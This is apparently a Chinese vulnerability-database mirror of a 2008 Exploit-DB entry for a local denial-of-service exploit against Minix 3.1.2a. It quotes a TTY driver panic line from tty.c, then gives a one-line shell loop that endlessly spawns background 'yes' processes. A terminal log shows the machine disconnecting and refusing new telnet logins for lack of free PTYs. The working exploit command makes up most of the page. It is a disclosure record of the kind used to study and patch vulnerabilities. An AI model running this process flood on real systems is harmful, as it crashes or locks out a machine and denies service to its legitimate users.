Minix 3.1.2a - Local TTY Panic (Denial of Service)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056759 漏洞类型
发布时间 2008-07-23 更新时间 2008-07-23
CVE编号 N/A CNNVD-ID N/A
漏洞平台 MINIX CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/6120
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# kokanin@gmail 20080723
# minix 3.1.2a tty panic

trunk/src/drivers/tty/tty.c

 14965	  if ((status = send(replyee, &tty_mess)) != OK) {
 14966	        panic("TTY","tty_reply failed, status\n", status);

$ uname -a
Minix 192.168.1.2 3 1.2a i686
$ while true ; do (yes "yes yes minix uh ah"&) ; done
[snip snip]
$ ^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C

...disconnected

telnet 192.168.1.2
Trying 192.168.1.2...
Connected to 192.168.1.2.
Escape character is '^]'.
I am sorry, but there is no free PTY left!
Connection closed by foreign host.

hai, no moar pty, kthxbye
--
kokanin

# milw0rm.com [2008-07-23]